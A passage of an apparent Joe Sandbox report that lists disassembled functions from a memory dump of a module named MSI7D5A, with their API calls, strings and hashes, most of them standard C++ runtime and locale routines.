                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID: api-ms-
                                                      • API String ID: 3664257935-2084034818
                                                      • Opcode ID: faa8686a87e2c8ad24248ac65e68b55acc9e5e08956f3c8bb4bc0d175f60707d
                                                      • Instruction ID: c74706eb58cc3be1378ae81ebe08f4935bd1480812cf5616cca1a14528c1fec7
                                                      • Opcode Fuzzy Hash: faa8686a87e2c8ad24248ac65e68b55acc9e5e08956f3c8bb4bc0d175f60707d
                                                      • Instruction Fuzzy Hash: 49117332A45225ABDB22DBE89C45B5E37B49F217B0F254260FA15FB280D770ED0187D5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A72DEE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,838A949E,?,?,00000000,00A86A6C,000000FF,?,00A72DC1,?,?,00A72D95,?), ref: 00A72E23
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A72E35
                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00A86A6C,000000FF,?,00A72DC1,?,?,00A72D95,?), ref: 00A72E57
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 12a644c8f286cac4f0b0034a8a5e438984d22cc385e153381167e53c5a09bed4
                                                      • Instruction ID: 462adf364d229062a35f35deaa9c0f286f35eae4a3def57395b2c357896df42e
                                                      • Opcode Fuzzy Hash: 12a644c8f286cac4f0b0034a8a5e438984d22cc385e153381167e53c5a09bed4
                                                      • Instruction Fuzzy Hash: 6601A731958619BFDB129F80CC09FAEBBB8FB04B10F004625F911A26A0DB74D901CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A76DB9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __alloca_probe_16.LIBCMT ref: 00A76E40
                                                      • __alloca_probe_16.LIBCMT ref: 00A76F01
                                                      • __freea.LIBCMT ref: 00A76F68
                                                        • Part of subcall function 00A75BDC: HeapAlloc.KERNEL32(00000000,00000000,00A73841,?,00A7543A,?,00000000,?,00A66CE7,00000000,00A73841,00000000,?,?,?,00A7363B), ref: 00A75C0E
                                                      • __freea.LIBCMT ref: 00A76F7D
                                                      • __freea.LIBCMT ref: 00A76F8D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                      • String ID:
                                                      • API String ID: 1096550386-0
                                                      • Opcode ID: ec5a7c67f22e8a091d6fd1ff01c0708c65b94495a40399417765bfb0b7651247
                                                      • Instruction ID: f74f19544031888e3889e8c775110fa1b7dd97b6218cb589227525edb58d6592
                                                      • Opcode Fuzzy Hash: ec5a7c67f22e8a091d6fd1ff01c0708c65b94495a40399417765bfb0b7651247
                                                      • Instruction Fuzzy Hash: F7517F72600A06AFEB219FA4DD41FBF7AA9EF44750B15C569FD0CDA251EB31DC108BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4B8B0 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4B8DD
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4B900
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B928
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4B98D
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B9B7
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                      • String ID:
                                                      • API String ID: 459529453-0
                                                      • Opcode ID: 6dfc444edf346c4b4b724e8e49812e818110185014a3a8368c963b6b0e603d49
                                                      • Instruction ID: fef3375ade57f15146bab1d0945625e8de7f4ed3796db277e86c9d28d867871a
                                                      • Opcode Fuzzy Hash: 6dfc444edf346c4b4b724e8e49812e818110185014a3a8368c963b6b0e603d49
                                                      • Instruction Fuzzy Hash: 42313735A00214EFCB10CF94D940BAEBBB4FF64320F24415AEA04673A2DB71ED06CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A45890 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,?,75474450,00A45646,?,?,?,?,?), ref: 00A45898
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                      • API String ID: 1452528299-1782174991
                                                      • Opcode ID: 251a52e510a43f4afbe24d8f6a400ab9edba5d5351e579d47052bbb08769463a
                                                      • Instruction ID: 5d21c2d010290edfe43cbb313d9ce73c860cde2a285aef8d53f781080339583d
                                                      • Opcode Fuzzy Hash: 251a52e510a43f4afbe24d8f6a400ab9edba5d5351e579d47052bbb08769463a
                                                      • Instruction Fuzzy Hash: 90118E5AF10621C7DF301F7C980136AA2E4DF91754F65187FE889DB392EAB58C818395
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A51C42 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Maklocstr$Maklocchr
                                                      • String ID:
                                                      • API String ID: 2020259771-0
                                                      • Opcode ID: d8bce6abefcf3e6453d2bc66481eb7faf9ae5f838a69eb91492ed0e49494a17d
                                                      • Instruction ID: 8f33c79c197f799ff4f5cbe5e930459f18400ad002a48d6def15151b07dd58c6
                                                      • Opcode Fuzzy Hash: d8bce6abefcf3e6453d2bc66481eb7faf9ae5f838a69eb91492ed0e49494a17d
                                                      • Instruction Fuzzy Hash: 44118CB1A40784BBE720DBA48882F32B7ECBF05352F080519FA458BA41D275FC5887A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4D87C Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A4D883
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4D88D
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • numpunct.LIBCPMT ref: 00A4D8C7
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4D8DE
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4D8FE
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                      • String ID:
                                                      • API String ID: 743221004-0
                                                      • Opcode ID: 006fcc61b45bb362ebd0e4044e7db12d33b597776c6652aa7d2486f972019455
                                                      • Instruction ID: 9cb0a42b390115c07de7c77c7030703e56cf7f4a063177296ff6fd136ca6a9f5
                                                      • Opcode Fuzzy Hash: 006fcc61b45bb362ebd0e4044e7db12d33b597776c6652aa7d2486f972019455
                                                      • Instruction Fuzzy Hash: 8911CB3AA0021A9FCF04EBA0DA51ABE77B1BFD4710F240409E811AB291CF749E068B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A522FA Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52301
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5230B
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • codecvt.LIBCPMT ref: 00A52345
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5235C
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5237C
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                      • String ID:
                                                      • API String ID: 712880209-0
                                                      • Opcode ID: 88c3f86fee4bedb465f596ef7350b9a78c0da176ef9086e2d11902414ce66cf8
                                                      • Instruction ID: a4dbd9d36bb8e73acea0fd1e751755e9fd6aa6f629b80514752b0fedd3e94f36
                                                      • Opcode Fuzzy Hash: 88c3f86fee4bedb465f596ef7350b9a78c0da176ef9086e2d11902414ce66cf8
                                                      • Instruction Fuzzy Hash: 2301C0369001159BCF14FBA4E941AAEB7B1BF80721F240509F810AB291DF789E498B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5238F Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52396
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A523A0
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • codecvt.LIBCPMT ref: 00A523DA
                                                      • std::_Facet_Register.LIBCPMT ref: 00A523F1
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52411
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                      • String ID:
                                                      • API String ID: 712880209-0
                                                      • Opcode ID: 64bb39e3c4a33c1789afc658c98b929b0690ca6eacb607fdaa53183eea2699fa
                                                      • Instruction ID: f44be8c2724f43eeedd785ae82e9cc872cff3c40e88fefad06a89747701cd4d1
                                                      • Opcode Fuzzy Hash: 64bb39e3c4a33c1789afc658c98b929b0690ca6eacb607fdaa53183eea2699fa
                                                      • Instruction Fuzzy Hash: 8201C036A001199FCB14FBA49A41BBE77B1BF80721F244809F8106B291DF789E4ACB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A524B9 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A524C0
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A524CA
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • collate.LIBCPMT ref: 00A52504
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5251B
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5253B
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                      • String ID:
                                                      • API String ID: 1007100420-0
                                                      • Opcode ID: b263423e231c32584e7ecac3e320f7c18e853e955683ea4cc824db31c7b6d54f
                                                      • Instruction ID: 66de4997e4ef8484f523c7d656b0f374e2ab87c8eb0953e8867c9f3832e6ac52
                                                      • Opcode Fuzzy Hash: b263423e231c32584e7ecac3e320f7c18e853e955683ea4cc824db31c7b6d54f
                                                      • Instruction Fuzzy Hash: 3F01D236900115DBCB15FBA4E955AAEB7B1BF94721F240409F81067391DF789E498B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52424 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5242B
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52435
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • collate.LIBCPMT ref: 00A5246F
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52486
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A524A6
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                      • String ID:
                                                      • API String ID: 1007100420-0
                                                      • Opcode ID: 058b8bad7667e4e773dadcf682103e5bbc192c618a11a534daae35af50bd4ec1
                                                      • Instruction ID: 554a4e661477447f1f140e08d830e2626b2229febf6e0e5b08dd92682044d3a7
                                                      • Opcode Fuzzy Hash: 058b8bad7667e4e773dadcf682103e5bbc192c618a11a534daae35af50bd4ec1
                                                      • Instruction Fuzzy Hash: AD018C369002199FCF15FBA4EA51AAE7BB1BF85721F240409F8106B292DF749E49CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A525E3 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A525EA
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A525F4
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • messages.LIBCPMT ref: 00A5262E
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52645
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52665
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                      • String ID:
                                                      • API String ID: 2750803064-0
                                                      • Opcode ID: ec1d0e65066507b015ea0084ec0c5842059a973fee092e00d9c736bebd00b588
                                                      • Instruction ID: 4da0d4372c0ca4ca8fe564a601d965c6bf4100ca6ea85246a60cd4be08caaa68
                                                      • Opcode Fuzzy Hash: ec1d0e65066507b015ea0084ec0c5842059a973fee092e00d9c736bebd00b588
                                                      • Instruction Fuzzy Hash: E801DE369001199BCF05FBA4DA51ABEB7B1FF91721F244409F8106B291CF749E09CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5254E Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52555
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5255F
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • ctype.LIBCPMT ref: 00A52599
                                                      • std::_Facet_Register.LIBCPMT ref: 00A525B0
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A525D0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                      • String ID:
                                                      • API String ID: 83828444-0
                                                      • Opcode ID: a8b7db10573cd1f38cea3dcdb5b01a53d62f008097726484e49fbe56af620dfb
                                                      • Instruction ID: e5b40b232a4b77c246ea4b7e36e9872dfc15e4551a81afceaff3c45c74aaee43
                                                      • Opcode Fuzzy Hash: a8b7db10573cd1f38cea3dcdb5b01a53d62f008097726484e49fbe56af620dfb
                                                      • Instruction Fuzzy Hash: F101D2369011199BCF04FBA4D952AAE77B1BF84721F244809FC11A7292EF789E49CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4D6BD Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A4D6C4
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4D6CE
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • codecvt.LIBCPMT ref: 00A4D708
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4D71F
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4D73F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                      • String ID:
                                                      • API String ID: 712880209-0
                                                      • Opcode ID: c72b5c5a76f8d6761fc17fa1444e7ceb79ecb904a4dbdf5fa970f8dbc8674262
                                                      • Instruction ID: 6a61ba61674d2386cf0ab393658e30c536c3756514f223847fe3583626ad63a2
                                                      • Opcode Fuzzy Hash: c72b5c5a76f8d6761fc17fa1444e7ceb79ecb904a4dbdf5fa970f8dbc8674262
                                                      • Instruction Fuzzy Hash: BD01923A9001159FCB15FBA4DA51AAE7BB1BFD4720F240509F8106B292DF749E05C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52678 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5267F
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52689
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • messages.LIBCPMT ref: 00A526C3
                                                      • std::_Facet_Register.LIBCPMT ref: 00A526DA
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A526FA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                      • String ID:
                                                      • API String ID: 2750803064-0
                                                      • Opcode ID: 7451f61483ca6bb8754fbfbae8344e3b124eda63c616bd80743db0330258ceb1
                                                      • Instruction ID: ebfece037f73fda1a5b73fc454fd08775d2a0787ff75bbea95ce3957186f7ee6
                                                      • Opcode Fuzzy Hash: 7451f61483ca6bb8754fbfbae8344e3b124eda63c616bd80743db0330258ceb1
                                                      • Instruction Fuzzy Hash: 0F01D2369001159FCF05FBA4DA45ABEB7B1BF84721F244809F81067391CF749E0ACB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5E8D8 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5E8DF
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5E8E9
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
